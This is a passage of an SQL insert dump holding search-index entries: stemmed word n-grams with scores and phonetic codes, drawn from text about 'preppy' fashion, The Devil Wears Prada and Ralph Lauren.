emerge',0,1,1.6333,'P2312562',1,'en'),(38586,'prada','prada',0,0,0.3333,'P630',1,'en'),(38587,'prada the','prada the',0,1,1.3,'P630',1,'en'),(38588,'prada the idea','prada the idea',0,1,1.4667,'P630',1,'en'),(38589,'prep','prep',0,0,0.2667,'P610',1,'en'),(38590,'prep school','prep school',0,1,1.3667,'P6124',1,'en'),(38591,'prep school attended','prep school attended',0,1,1.6667,'P6124353',1,'en'),(38592,'preppy','preppi',0,0,0.4,'P610',1,'en'),(38593,'preppy anyone','preppi anyone',0,1,1.4333,'P615',1,'en'),(38594,'preppy anyone kept','preppi anyone kept',0,1,1.6,'P615213',1,'en'),(38595,'preppy college','preppi college',0,1,1.4667,'P61242',1,'en'),(38596,'preppy college preppy','preppi college preppy',0,1,1.7,'P61242161',1,'en'),(38597,'preppy culture','preppi culture',0,1,1.4667,'P612436',1,'en'),(38598,'preppy culture idealizes','preppi culture idealizes',0,1,1.8,'P612436342',1,'en'),(38599,'preppy has','preppi has',0,1,1.3333,'P612',1,'en'),(38600,'preppy has come','preppi has come',0,1,1.5,'P6125',1,'en'),(38601,'preppy have','preppi have',0,1,1.3667,'P610',1,'en'),(38602,'preppy have you','preppi have you',0,1,1.5,'P610',1,'en'),(38603,'preppy is','preppi is',0,1,1.3,'P612',1,'en'),(38604,'preppy is and','preppi is and',0,1,1.4333,'P61253',1,'en'),(38605,'preppy means','preppi means',0,1,1.4,'P6152',1,'en'),(38606,'preppy means i','preppi means i',0,1,1.4667,'P6152',1,'en'),(38607,'preppy meant','preppi meant',0,1,1.4,'P6153',1,'en'),(38608,'preppy meant kids','preppi meant kids',0,1,1.5667,'P6153232',1,'en'),(38609,'preppy preppy','preppi preppy',0,1,1.4333,'P6161',1,'en'),(38610,'preppy preppy is','preppi preppy is',0,1,1.5333,'P61612',1,'en'),(38611,'preppy rory','preppi rory',0,1,1.3667,'P616',1,'en'),(38612,'preppy rory gilmore','preppi rory gilmore',0,1,1.6333,'P6162456',1,'en'),(38613,'preps','prep',0,0,0.3333,'P612',1,'en'),(38614,'preps are','prep are',0,1,1.3,'P6126',1,'en'),(38615,'preps are people','prep are people',0,1,1.5333,'P612614',1,'en'),(38616,'priced','price',0,0,0.4,'P623',2,'en'),(38617,'priced but','price but',0,1,1.3333,'P62313',1,'en'),(38618,'priced but appears','price but appears',0,1,1.6,'P62313162',1,'en'),(38619,'prints thanks','print thanks',0,1,1.4333,'P6532352',1,'en'),(38620,'prints thanks to','print thanks to',0,1,1.5333,'P65323523',1,'en'),(38621,'production company the','product company the',0,1,1.7333,'P6323525153',1,'en'),(38622,'public in','public in',0,1,1.3,'P425',1,'en'),(38623,'public in this','public in this',0,1,1.4667,'P42532',1,'en'),(38624,'purchasing fashion','purchas fashion',0,1,1.6,'P6252125',1,'en'),(38625,'purchasing fashion wasn\'t','purchas fashion wasn',0,1,1.8333,'P6252125253',1,'en'),(38626,'put on','put on',0,1,1.2,'P350',1,'en'),(38627,'put on your','put on your',0,1,1.3667,'P356',1,'en'),(38628,'quickly showed','quickli showed',0,1,1.4667,'Q423',1,'en'),(38629,'quickly showed up','quickli showed up',0,1,1.5667,'Q4231',1,'en'),(38630,'quote','quot',0,0,0.3333,'Q300',1,'en'),(38631,'quote a','quot a',0,1,1.2333,'Q300',1,'en'),(38632,'quote a line','quot a line',0,1,1.4,'Q345',1,'en'),(38633,'ralph lauren bedding','ralph lauren bedding',0,1,1.6667,'R414651352',1,'en'),(38634,'ralph lauren is','ralph lauren is',0,1,1.5,'R414652',1,'en'),(38635,'ranges','rang',0,0,0.4,'R520',1,'en'),(38636,'ranges of','rang of',0,1,1.3,'R521',1,'en'),(38637,'ranges of 8','rang of 8',0,1,1.3667,'R521',1,'en'),(38638,'ready','readi',0,0,0.3333,'R300',1,'en'),(38639,'ready not','readi not',0,1,1.3,'R353',1,'en'),(38640,'ready not necessarily','readi not necessarily',0,1,1.7,'R3535264',1,'en'),(38641,'realize that','realiz that',0,1,1.4,'R423',1,'en'),(38642,'realize that that','realiz that that',0,1,1.5667,'R423',1,'en'),(38643,'redesign','redesign',0,0,0.5333,'R325',1,'en'),(38644,'redesign ralph','redesign ralph',0,1,1.4667,'R325641',1,'en'),(38645,'redesign ralph lauren','redesign ralph lauren',0,1,1.7,'R325641465',1,'en'),(38646,'refer to opportunity','refer to opportunity',0,1,1.6667,'R16316353',1,'en'),(38647,'renta','renta',0,0,0.3333,'R530',1,'en'),(38648,'renta did','renta did',0,1,1.3,'R530',1,'en'),(38649,'renta did an','renta did an',0,1,1.4,'R535',1,'en'),(38650,'represents','repres',0,0,0.6667,'R162532',2,'en'),(38651,'represents vast','repres vast',0,1,1.5,'R162532123',1,'en'),(38652,'represents vast amounts','repres vast amounts',0,1,1.7667,'R162532123532',1,'en'),(38653,'rest','rest',0,0,0.2667,'R230',1,'en'),(38654,'rest are','rest are',0,1,1.2667,'R236',1,'en'),(38655,'rest are copycats','rest are copycats',0,1,1.5667,'R23621232',1,'en'),(38656,'revise','revis',0,0,0.4,'R120',1,'en'),(38657,'revise 1','revis 1',0,1,1.2667,'R120',1,'en'),(38658,'revise 1 the','revis 1 the',0,1,1.4,'R123',1,'en'),(38659,'riches','rich',0,0,0.4,'R200',1,'en'),(38660,'riches the','rich the',0,1,1.3333,'R230',1,'en'),(38661,'riches the culture','rich the culture',0,1,1.6,'R232436',1,'en'),(38662,'right most','right most',0,1,1.3333,'R23523',1,'en'),(38663,'right most teenagers','right most teenagers',0,1,1.6667,'R235235262',1,'en'),(38664,'ripped','rip',0,0,0.4,'R130',2,'en'),(38665,'ripped up','rip up',0,1,1.3,'R131',1,'en'),(38666,'ripped up jeans','rip up jeans',0,1,1.5,'R131252',1,'en'),(38667,'room','room',0,0,0.2667,'R500',2,'en'),(38668,'room due','room due',0,1,1.2667,'R530',1,'en'),(38669,'room due to','room due to',0,1,1.3667,'R530',1,'en'),(38670,'rory','rori',0,0,0.2667,'R000',1,'en'),(38671,'rory gilmore','rori gilmore',0,1,1.4,'R2456',1,'en'),(38672,'rory gilmore can','rori gilmore can',0,1,1.5333,'R245625',1,'en'),(38673,'runway','runwai',0,0,0.4,'R500',1,'en'),(38674,'runway trends','runwai trends',0,1,1.4333,'R536532',1,'en'),(38675,'runway trends shows','runwai trends shows',0,1,1.6333,'R536532',1,'en'),(38676,'sad','sad',0,0,0.2,'S300',1,'en'),(38677,'sad that','sad that',0,1,1.2667,'S300',1,'en'),(38678,'sad that the','sad that the',0,1,1.4,'S300',1,'en'),(38679,'sandals revise','sandal revise',0,1,1.4667,'S5342612',1,'en'),(38680,'sandals revise 1','sandal revise 1',0,1,1.5333,'S5342612',1,'en'),(38681,'says who','sai who',0,1,1.2667,'S000',1,'en'),(38682,'says who likes','sai who likes',0,1,1.4667,'S420',1,'en'),(38683,'scale','scale',0,0,0.3333,'S400',1,'en'),(38684,'scale then','scale then',0,1,1.3333,'S435',1,'en'),(38685,'scale then any','scale then any',0,1,1.4667,'S435',1,'en'),(38686,'school','school',0,0,0.4,'S400',4,'en'),(38687,'school attended','school attended',0,1,1.5,'S4353',1,'en'),(38688,'school attended is','school attended is',0,1,1.6,'S43532',1,'en'),(38689,'school eliteness','school eliteness',0,1,1.5333,'S4352',1,'en'),(38690,'school eliteness or','school eliteness or',0,1,1.6333,'S43526',1,'en'),(38691,'schools','school',0,0,0.4667,'S420',1,'en'),(38692,'schools often','school often',0,1,1.4333,'S42135',1,'en'),(38693,'schools often boarding','school often boarding',0,1,1.7333,'S4213516352',1,'en'),(38694,'see the top','see the top',0,1,1.3667,'S310',1,'en'),(38695,'seekers','seeker',0,0,0.4667,'S620',1,'en'),(38696,'seekers of','seeker of',0,1,1.3333,'S621',1,'en'),(38697,'seekers of a','seeker of a',0,1,1.4,'S621',1,'en'),(38698,'selected for','select for',0,1,1.4,'S42316',1,'en'),(38699,'selected for you','select for you',0,1,1.5333,'S42316',1,'en'),(38700,'self','self',0,0,0.2667,'S410',1,'en'),(38701,'self on','self on',0,1,1.2333,'S415',1,'en'),(38702,'self on y','self on y',0,1,1.3,'S415',1,'en'),(38703,'sentira','sentira',0,0,0.4667,'S536',1,'en'),(38704,'sentira bradely','sentira bradely',0,1,1.5,'S5361634',1,'en'),(38705,'sentira bradely to','sentira bradely to',0,1,1.6,'S53616343',1,'en'),(38706,'seriously','serious',0,0,0.6,'S624',1,'en'),(38707,'seriously to','serious to',0,1,1.4,'S6243',1,'en'),(38708,'seriously to care','serious to care',0,1,1.5667,'S624326',1,'en'),(38709,'short while','short while',0,1,1.3667,'S634',2,'en'),(38710,'short while ago','short while ago',0,1,1.5,'S6342',1,'en'),(38711,'showed','show',0,0,0.4,'S300',1,'en'),(38712,'showed cerulean','show cerulean',0,1,1.5,'S32645',1,'en'),(38713,'showed cerulean army','show cerulean army',0,1,1.6667,'S3264565',1,'en'),(38714,'showed up','show up',0,1,1.3,'S310',1,'en'),(38715,'showed up in','show up in',0,1,1.4,'S315',1,'en'),(38716,'shows which','show which',0,1,1.3667,'S000',1,'en'),(38717,'shows which may','show which may',0,1,1.5,'S500',1,'en'),(38718,'slum','slum',0,0,0.2667,'S450',1,'en'),(38719,'slum area','slum area',0,1,1.3,'S456',1,'en'),(38720,'slum area were','slum area were',0,1,1.4667,'S456',1,'en'),(38721,'so as','so as',0,1,1.1667,'S000',1,'en'),(38722,'so as long','so as long',0,1,1.3333,'S452',1,'en'),(38723,'so it sort','so it sort',0,1,1.3333,'S3263',1,'en'),(38724,'sociability','sociabl',0,0,0.7333,'S143',1,'en'),(38725,'sociability and','sociabl and',0,1,1.5,'S14353',1,'en'),(38726,'sociability and riches','sociabl and riches',0,1,1.7333,'S1435362',1,'en'),(38727,'some outdoor','some outdoor',0,1,1.4,'S536',1,'en'),(38728,'some outdoor patio','some outdoor patio',0,1,1.6,'S53613',1,'en'),(38729,'some positive','some positive',0,1,1.4333,'S51231',1,'en'),(38730,'some positive can','some positive can',0,1,1.5667,'S5123125',1,'en'),(38731,'some tragic','some tragic',0,1,1.3667,'S5362',1,'en'),(38732,'some tragic casual','some tragic casual',0,1,1.6,'S53624',1,'en'),(38733,'sometimes given','sometim given',0,1,1.5,'S535215',1,'en'),(38734,'sometimes given more','sometim given more',0,1,1.6667,'S5352156',1,'en'),(38735,'sort of comical','sort of comical',0,1,1.5,'S6312524',1,'en'),(38736,'spell','spell',0,0,0.3333,'S140',1,'en'),(38737,'spell it','spell it',0,1,1.2667,'S143',1,'en'),(38738,'spell it out','spell it out',0,1,1.4,'S143',1,'en'),(38739,'st laurent','st laurent',0,1,1.3333,'S34653',1,'en'),(38740,'st laurent wasn','st laurent wasn',0,1,1.5,'S3465325',1,'en'),(38741,'status','statu',0,0,0.4,'S320',1,'en'),(38742,'status and','statu and',0,1,1.3333,'S3253',1,'en'),(38743,'status and ethnic','statu and ethnic',0,1,1.5667,'S325352',1,'en'),(38744,'straight','straight',0,0,0.5333,'S3623',2,'en'),(38745,'straight a','straight a',0,1,1.3333,'S3623',1,'en'),(38746,'straight a until','straight a until',0,1,1.5333,'S3623534',1,'en'),(38747,'strangely','strang',0,0,0.6,'S36524',1,'en'),(38748,'strangely enough','strang enough',0,1,1.5333,'S3652452',1,'en'),(38749,'strangely enough enough','strang enough enough',0,1,1.7667,'S365245252',1,'en'),(38750,'streep','streep',0,0,0.4,'S361',1,'en'),(38751,'streep or','streep or',0,1,1.3,'S3616',1,'en'),(38752,'streep or perhaps','streep or perhaps',0,1,1.5667,'S36161612',1,'en'),(38753,'stuff meryl','stuff meryl',0,1,1.3667,'S31564',1,'en'),(38754,'stuff meryl streep','stuff meryl streep',0,1,1.6,'S315642361',1,'en'),(38755,'substantial','substanti',0,0,0.7333,'S123534',1,'en'),(38756,'substantial the','substanti the',0,1,1.5,'S1235343',1,'en'),(38757,'substantial the latter','substanti the latter',0,1,1.7333,'S1235343436',1,'en'),(38758,'successes','success',0,0,0.6,'S000',1,'en'),(38759,'successes and','success and',0,1,1.4333,'S530',1,'en'),(38760,'successes and got','success and got',0,1,1.5667,'S5323',1,'en'),(38761,'suppose','suppos',0,0,0.4667,'S120',1,'en'),(38762,'suppose to','suppos to',0,1,1.3333,'S123',1,'en'),(38763,'suppose to explain','suppos to explain',0,1,1.6,'S1232145',1,'en'),(38764,'surely','sure',0,0,0.4,'S640',1,'en'),(38765,'surely fished','sure fished',0,1,1.4333,'S64123',1,'en'),(38766,'surely fished it','sure fished it',0,1,1.5333,'S64123',1,'en'),(38767,'sweater','sweater',0,0,0.4667,'S360',1,'en'),(38768,'sweater isn\'t','sweater isn',0,1,1.4333,'S36253',1,'en'),(38769,'sweater isn\'t blue','sweater isn blue',0,1,1.6,'S3625314',1,'en'),(38770,'sweater that','sweater that',0,1,1.4,'S363',1,'en'),(38771,'sweater that was','sweater that was',0,1,1.5333,'S3632',1,'en'),(38772,'take yourself','take yourself',0,1,1.4333,'T26241',1,'en'),(38773,'take yourself too','take yourself too',0,1,1.5667,'T262413',1,'en'),(38774,'taken a','taken a',0,1,1.2333,'T250',1,'en'),(38775,'taken a term','taken a term',0,1,1.4,'T25365',1,'en'),(38776,'teenagers','teenag',0,0,0.6,'T5262',1,'en'),(38777,'teenagers concept','teenag concept',0,1,1.5667,'T52625213',1,'en'),(38778,'teenagers concept of','teenag concept of',0,1,1.6667,'T526252131',1,'en'),(38779,'teenagers that','teenag that',0,1,1.4667,'T52623',1,'en'),(38780,'teenagers that wear','teenag that wear',0,1,1.6333,'T526236',1,'en'),(38781,'teenagers who','teenag who',0,1,1.4333,'T5262',1,'en'),(38782,'teenagers who call','teenag who call',0,1,1.6,'T52624',1,'en'),(38783,'tell','tell',0,0,0.2667,'T400',1,'en'),(38784,'tell everyone','tell everyone',0,1,1.4333,'T4165',1,'en'),(38785,'tell everyone around','tell everyone around',0,1,1.6667,'T4165653',1,'en'),(38786,'term changing','term changing',0,1,1.4333,'T6525252',1,'en'),(38787,'term changing the','term changing the',0,1,1.5667,'T65252523',1,'en'),(38788,'term has','term has',0,1,1.2667,'T652',1,'en'),(38789,'term has degraded','term has degraded',0,1,1.5667,'T6523263',1,'en'),(38790,'term not','term not',0,1,1.2667,'T653',1,'en'),(38791,'term not any','term not any',0,1,1.4,'T6535',1,'en'),(38792,'term preppy','term preppy',0,1,1.3667,'T65161',1,'en'),(38793,'term preppy preppy','term preppy preppy',0,1,1.6,'T6516161',1,'en'),(38794,'term that','term that',0,1,1.3,'T653',1,'en'),(38795,'term that describes','term that describes',0,1,1.6333,'T6532612',1,'en'),(38796,'term that used','term that used',0,1,1.4667,'T65323',1,'en'),(38797,'than the college','than the college',0,1,1.5333,'T53242',1,'en'),(38798,'thanks','thank',0,0,0.4,'T520',1,'en'),(38799,'thanks to','thank to',0,1,1.3,'T523',1,'en'),(38800,'thanks to you','thank to you',0,1,1.4333,'T523',1,'en'),(38801,'that a','that a',0,1,1.2,'T000',1,'en'),(38802,'that a school','that a school',0,1,1.4333,'T240',1,'en'),(38803,'that blue','that blue',0,1,1.3,'T140',1,'en'),(38804,'that blue represents','that blue represents',0,1,1.6667,'T146162532',1,'en'),(38805,'that describes','that describes',0,1,1.4667,'T2612',1,'en'),(38806,'that describes teenagers','that describes teenagers',0,1,1.8,'T261235262',1,'en'),(38807,'that exempts','that exempts',0,1,1.4,'T25132',1,'en'),(38808,'that exempts you','that exempts you',0,1,1.5333,'T25132',1,'en'),(38809,'that in 2002','that in 2002',0,1,1.4,'T500',1,'en'),(38810,'that is loud','that is loud',0,1,1.4,'T243',1,'en'),(38811,'that it is','that it is',0,1,1.3333,'T200',1,'en'),(38812,'that lumpy','that lumpy',0,1,1.3333,'T451',1,'en'),(38813,'that lumpy blue','that lumpy blue',0,1,1.5,'T4514',1,'en'),(38814,'that preppy','that preppy',0,1,1.3667,'T161',1,'en'),(38815,'that preppy meant','that preppy meant',0,1,1.5667,'T16153',1,'en'),(38816,'that sweater','that sweater',0,1,1.4,'T236',1,'en'),(38817,'that sweater isn\'t','that sweater isn',0,1,1.6,'T236253',1,'en'),(38818,'that that','that that',0,1,1.3,'T000',1,'en'),(38819,'that that lumpy','that that lumpy',0,1,1.5,'T451',1,'en'),(38820,'that that sweater','that that sweater',0,1,1.5667,'T236',1,'en'),(38821,'that the term','that the term',0,1,1.4333,'T650',1,'en'),(38822,'that used to','that used to',0,1,1.4,'T230',1,'en'),(38823,'that was','that was',0,1,1.2667,'T200',1,'en'),(38824,'that was selected','that was selected',0,1,1.5667,'T2423',1,'en'),(38825,'that wear','that wear',0,1,1.3,'T600',1,'en'),(38826,'that wear ripped','that wear ripped',0,1,1.5333,'T613',1,'en'),(38827,'that you made','that you made',0,1,1.4333,'T530',1,'en'),(38828,'that you take','that you take',0,1,1.4333,'T200',1,'en'),(38829,'the college','the college',0,1,1.3667,'T242',1,'en'),(38830,'the college this','the college this',0,1,1.5333,'T24232',1,'en'),(38831,'the concept gay','the concept gay',0,1,1.5,'T252132',1,'en'),(38832,'the culture','the culture',0,1,1.3667,'T2436',1,'en'),(38833,'the culture also','the culture also',0,1,1.5333,'T243642',1,'en'),(38834,'the devil','the devil',0,1,1.3,'T140',1,'en'),(38835,'the devil might','the devil might',0,1,1.5,'T14523',1,'en'),(38836,'the fashion','the fashion',0,1,1.3667,'T125',1,'en'),(38837,'the fashion industry','the fashion industry',0,1,1.6667,'T1253236',1,'en'),(38838,'the hamptons','the hamptons',0,1,1.4,'T51352',1,'en'),(38839,'the hamptons martha','the hamptons martha',0,1,1.6333,'T51352563',1,'en'),(38840,'the idea','the idea',0,1,1.2667,'T000',1,'en'),(38841,'the idea ohio','the idea ohio',0,1,1.4333,'T000',1,'en'),(38842,'the latter','the latter',0,1,1.3333,'T436',1,'en'),(38843,'the latter universites','the latter universites',0,1,1.7333,'T436516232',1,'en'),(38844,'the less','the less',0,1,1.2667,'T420',1,'en'),(38845,'the less fortunate','the less fortunate',0,1,1.6,'T4216353',1,'en'),(38846,'the malls','the malls',0,1,1.3,'T542',1,'en'),(38847,'the malls and','the malls and',0,1,1.4333,'T54253',1,'en'),(38848,'the masses','the masses',0,1,1.3333,'T520',1,'en'),(38849,'the masses as','the masses as',0,1,1.4333,'T520',1,'en'),(38850,'the mix','the mix',0,1,1.2333,'T520',1,'en'),(38851,'the mix like','the mix like',0,1,1.4,'T5242',1,'en'),(38852,'the prep','the prep',0,1,1.2667,'T161',1,'en'),(38853,'the prep school','the prep school',0,1,1.5,'T16124',1,'en'),(38854,'the ranges','the ranges',0,1,1.3333,'T652',1,'en'),(38855,'the ranges of','the ranges of',0,1,1.4333,'T6521',1,'en'),(38856,'the sweater','the sweater',0,1,1.3667,'T236',1,'en'),(38857,'the sweater that','the sweater that',0,1,1.5333,'T2363',1,'en'),(38858,'the term','the term',0,1,1.2667,'T650',1,'en'),(38859,'the term changing','the term changing',0,1,1.5667,'T6525252',1,'en'),(38860,'the term has','the term has',0,1,1.4,'T652',1,'en'),(38861,'the term not','the term not',0,1,1.4,'T653',1,'en'),(38862,'the term preppy','the term preppy',0,1,1.5,'T65161',1,'en'),(38863,'the the malls','the the malls',0,1,1.4333,'T542',1,'en'),(38864,'the top','the top',0,1,1.2333,'T100',3,'en'),(38865,'the top colleges','the top colleges',0,1,1.5333,'T1242',1,'en'),(38866,'the well','the well',0,1,1.2667,'T400',1,'en'),(38867,'the well off','the well off',0,1,1.4,'T410',1,'en'),(38868,'the word','the word',0,1,1.2667,'T630',2,'en'),(38869,'the word preppy','the word preppy',0,1,1.5,'T63161',1,'en'),(38870,'thebelief','thebelief',0,0,0.6,'T141',1,'en'),(38871,'thebelief that','thebelief that',0,1,1.4667,'T1413',1,'en'),(38872,'thebelief that preppy','thebelief that preppy',0,1,1.7,'T1413161',1,'en'),(38873,'then any','then any',0,1,1.2667,'T500',1,'en'),(38874,'then any thing','then any thing',0,1,1.4667,'T5352',1,'en'),(38875,'then cerulean','then cerulean',0,1,1.4333,'T52645',1,'en'),(38876,'then cerulean quickly','then cerulean quickly',0,1,1.7,'T5264524',1,'en'),(38877,'then it','then it',0,1,1.2333,'T530',1,'en'),(38878,'then it filtered','then it filtered',0,1,1.5333,'T5314363',1,'en'),(38879,'then it was','then it was',0,1,1.3667,'T532',1,'en'),(38880,'then trickled','then trickled',0,1,1.4333,'T536243',1,'en'),(38881,'then trickled on','then trickled on',0,1,1.5333,'T5362435',1,'en'),(38882,'they have taken','thei have taken',0,1,1.5,'T1325',1,'en'),(38883,'they rest','thei rest',0,1,1.3,'T623',1,'en'),(38884,'they rest are','thei rest are',0,1,1.4333,'T6236',1,'en'),(38885,'they who','thei who',0,1,1.2667,'T000',1,'en'),(38886,'they who showed','thei who showed',0,1,1.5,'T230',1,'en'),(38887,'thing in','thing in',0,1,1.2667,'T525',1,'en'),(38888,'thing in abercrombie','thing in abercrombie',0,1,1.6667,'T525162651',1,'en'),(38889,'thing it','thing it',0,1,1.2667,'T523',1,'en'),(38890,'thing it not','thing it not',0,1,1.4,'T52353',1,'en'),(38891,'things like','thing like',0,1,1.3667,'T5242',1,'en'),(38892,'things like af','thing like af',0,1,1.4667,'T52421',1,'en'),(38893,'think that','think that',0,1,1.3333,'T523',2,'en'),(38894,'think that you','think that you',0,1,1.4667,'T523',1,'en'),(38895,'think this','think this',0,1,1.3333,'T5232',1,'en'),(38896,'think this is','think this is',0,1,1.4333,'T5232',1,'en'),(38897,'this is not','thi is not',0,1,1.3667,'T253',1,'en'),(38898,'this is why','thi is why',0,1,1.3667,'T200',1,'en'),(38899,'this job','thi job',0,1,1.2667,'T210',1,'en'),(38900,'this job cerulean','thi job cerulean',0,1,1.5667,'T212645',1,'en'),(38901,'this room','thi room',0,1,1.3,'T265',1,'en'),(38902,'this room due','thi room due',0,1,1.4333,'T2653',1,'en'),(38903,'through the the','through the the',0,1,1.5,'T623',1,'en'),(38904,'tied around','ti around',0,1,1.3667,'T653',1,'en'),(38905,'tied around your','ti around your',0,1,1.5333,'T6536',1,'en'),(38906,'time to come','time to come',0,1,1.4,'T5325',1,'en'),(38907,'tiring','tire',0,0,0.4,'T652',1,'en'),(38908,'tiring nice','tire nice',0,1,1.3667,'T65252',1,'en'),(38909,'tiring nice clothes','tire nice clothes',0,1,1.6333,'T65252432',1,'en'),(38910,'to business','to business',0,1,1.3667,'T1252',1,'en'),(38911,'to business and','to business and',0,1,1.5,'T125253',1,'en'),(38912,'to care','to care',0,1,1.2333,'T260',1,'en'),(38913,'to care about','to care about',0,1,1.4333,'T2613',1,'en'),(38914,'to come like','to come like',0,1,1.4,'T2542',1,'en'),(38915,'to describe','to describe',0,1,1.3667,'T261',1,'en'),(38916,'to describe a','to describe a',0,1,1.4333,'T261',1,'en'),(38917,'to explain','to explain',0,1,1.3333,'T2145',1,'en'),(38918,'to explain any','to explain any',0,1,1.4667,'T2145',1,'en'),(38919,'to explain slum','to explain slum',0,1,1.5,'T2145245',1,'en'),(38920,'to go into','to go into',0,1,1.3333,'T253',1,'en'),(38921,'to lapis','to lapis',0,1,1.2667,'T412',1,'en'),(38922,'to lapis this','to lapis this',0,1,1.4333,'T41232',1,'en'),(38923,'to mean','to mean',0,1,1.2333,'T500',1,'en'),(38924,'to opportunity','to opportunity',0,1,1.4667,'T16353',1,'en'),(38925,'to opportunity seekers','to opportunity seekers',0,1,1.7333,'T16353262',1,'en'),(38926,'to pile','to pile',0,1,1.2333,'T140',1,'en'),(38927,'to pile of','to pile of',0,1,1.3333,'T141',1,'en'),(38928,'to refer','to refer',0,1,1.2667,'T616',1,'en'),(38929,'to refer to','to refer to',0,1,1.3667,'T6163',1,'en'),(38930,'to spell','to spell',0,1,1.2667,'T214',1,'en'),(38931,'to spell it','to spell it',0,1,1.3667,'T2143',1,'en'),(38932,'to tell','to tell',0,1,1.2333,'T400',1,'en'),(38933,'to tell everyone','to tell everyone',0,1,1.5333,'T4165',1,'en'),(38934,'to the hamptons','to the hamptons',0,1,1.5,'T51352',1,'en'),(38935,'to the less','to the less',0,1,1.3667,'T420',1,'en'),(38936,'to the well','to the well',0,1,1.3667,'T400',1,'en'),(38937,'to your closet','to your closet',0,1,1.4667,'T62423',1,'en'),(38938,'too seriously','too seriously',0,1,1.4333,'T2624',1,'en'),(38939,'too seriously to','too seriously to',0,1,1.5333,'T26243',1,'en'),(38940,'top colleges','top colleges',0,1,1.4,'T1242',1,'en'),(38941,'top colleges and','top colleges and',0,1,1.5333,'T124253',1,'en'),(38942,'top tied','top tied',0,1,1.2667,'T130',1,'en'),(38943,'top tied around','top tied around',0,1,1.5,'T13653',1,'en'),(38944,'tragic','tragic',0,0,0.4,'T620',1,'en'),(38945,'tragic casual','tragic casual',0,1,1.4333,'T624',1,'en'),(38946,'tragic casual corner','tragic casual corner',0,1,1.6667,'T6242656',1,'en'),(38947,'trend','trend',0,0,0.3333,'T653',3,'en'),(38948,'trend along','trend along',0,1,1.3667,'T653452',1,'en'),(38949,'trend along with','trend along with',0,1,1.5333,'T6534523',1,'en'),(38950,'trend before','trend before',0,1,1.4,'T65316',1,'en'),(38951,'trend before denote','trend before denote',0,1,1.6333,'T65316353',1,'en'),(38952,'trends','trend',0,0,0.4,'T6532',1,'en'),(38953,'trends shows','trend shows',0,1,1.4,'T6532',1,'en'),(38954,'trends shows which','trend shows which',0,1,1.6,'T6532',1,'en'),(38955,'trickled','trickl',0,0,0.5333,'T6243',1,'en'),(38956,'trickled on','trickl on',0,1,1.3667,'T62435',1,'en'),(38957,'trickled on down','trickl on down',0,1,1.5333,'T6243535',1,'en'),(38958,'truthfully','truthfulli',0,0,0.6667,'T6314',1,'en'),(38959,'truthfully you','truthfulli you',0,1,1.4667,'T6314',1,'en'),(38960,'truthfully you wearing','truthfulli you wearing',0,1,1.7333,'T6314652',1,'en'),(38961,'trying','try',0,0,0.4,'T652',4,'en'),(38962,'trying to','try to',0,1,1.3,'T6523',4,'en'),(38963,'trying to tell','try to tell',0,1,1.4667,'T65234',1,'en'),(38964,'turn','turn',0,0,0.2667,'T650',1,'en'),(38965,'turn into','turn into',0,1,1.3,'T653',1,'en'),(38966,'turn into to','turn into to',0,1,1.4,'T653',1,'en'),(38967,'turned it','turn it',0,1,1.3,'T653',1,'en'),(38968,'turned it into','turn it into',0,1,1.4667,'T65353',1,'en'),(38969,'uk 2','uk 2',0,1,1.1333,'U200',1,'en'),(38970,'uk 2 ready','uk 2 ready',0,1,1.3333,'U263',1,'en'),(38971,'unaware','unawar',0,0,0.4667,'U560',1,'en'),(38972,'unaware that','unawar that',0,1,1.4,'U563',1,'en'),(38973,'unaware that in','unawar that in',0,1,1.5,'U5635',1,'en'),(38974,'unfavorable','unfavor',0,0,0.7333,'U51614',1,'en'),(38975,'unfavorable ghetto','unfavor ghetto',0,1,1.6,'U5161423',1,'en'),(38976,'unfavorable ghetto ghetto','unfavor ghetto ghetto',0,1,1.8333,'U516142323',1,'en'),(38977,'universites','universit',0,0,0.7333,'U516232',1,'en'),(38978,'universites and','universit and',0,1,1.5,'U51623253',1,'en'),(38979,'universites and colleges','universit and colleges',0,1,1.8,'U51623253242',1,'en'),(38980,'until i','until i',0,1,1.2333,'U534',1,'en'),(38981,'until i found','until i found',0,1,1.4333,'U534153',1,'en'),(38982,'up in','up in',0,1,1.1667,'U150',1,'en'),(38983,'up in the','up in the',0,1,1.3,'U153',1,'en'),(38984,'up jeans','up jeans',0,1,1.2667,'U1252',1,'en'),(38985,'up jeans and','up jeans and',0,1,1.4,'U125253',1,'en'),(38986,'urban','urban',0,0,0.3333,'U615',2,'en'),(38987,'urban area','urban area',0,1,1.3333,'U6156',1,'en'),(38988,'urban area no','urban area no',0,1,1.4333,'U61565',1,'en'),(38989,'use to mean','us to mean',0,1,1.3667,'U235',1,'en'),(38990,'used to','us to',0,1,1.2333,'U230',3,'en'),(38991,'used to go','us to go',0,1,1.3333,'U232',1,'en'),(38992,'used to spell','us to spell',0,1,1.4333,'U23214',1,'en'),(38993,'uses to','us to',0,1,1.2333,'U230',1,'en'),(38994,'uses to describe','us to describe',0,1,1.5333,'U23261',1,'en'),(38995,'vast','vast',0,0,0.2667,'V230',1,'en'),(38996,'vast amounts','vast amounts',0,1,1.4,'V23532',1,'en'),(38997,'vast amounts and','vast amounts and',0,1,1.5333,'V2353253',1,'en'),(38998,'vest','vest',0,0,0.2667,'V230',1,'en'),(38999,'vest ralph','vest ralph',0,1,1.3333,'V23641',1,'en'),(39000,'vest ralph lauren','vest ralph lauren',0,1,1.5667,'V23641465',1,'en'),(39001,'view word','view word',0,1,1.3,'V630',1,'en'),(39002,'view word and','view word and',0,1,1.4333,'V6353',1,'en'),(39003,'was always','wa always',0,1,1.3333,'W242',1,'en'),(39004,'was always of','wa always of',0,1,1.4333,'W2421',1,'en'),(39005,'was just suppose','wa just suppose',0,1,1.5333,'W23212',1,'en'),(39006,'was selected','wa selected',0,1,1.4,'W2423',1,'en'),(39007,'was selected for','wa selected for',0,1,1.5333,'W242316',1,'en'),(39008,'was turn','wa turn',0,1,1.2667,'W2365',1,'en'),(39009,'was turn into','wa turn into',0,1,1.4333,'W23653',1,'en'),(39010,'was yves','wa yves',0,1,1.2667,'W212',1,'en'),(39011,'was yves st','wa yves st',0,1,1.3667,'W2123',1,'en'),(39012,'wasn','wasn',0,0,0.2667,'W250',1,'en'),(39013,'wasn they','wasn they',0,1,1.3,'W253',1,'en'),(39014,'wasn they who','wasn they who',0,1,1.4333,'W253',1,'en'),(39015,'wasn\'t meant','wasn meant',0,1,1.4,'W25353',1,'en'),(39016,'wasn\'t meant to','wasn meant to',0,1,1.5,'W25353',1,'en'),(39017,'wasp','wasp',0,0,0.2667,'W210',1,'en'),(39018,'wasp families','wasp families',0,1,1.4333,'W21542',1,'en'),(39019,'wasp families and','wasp families 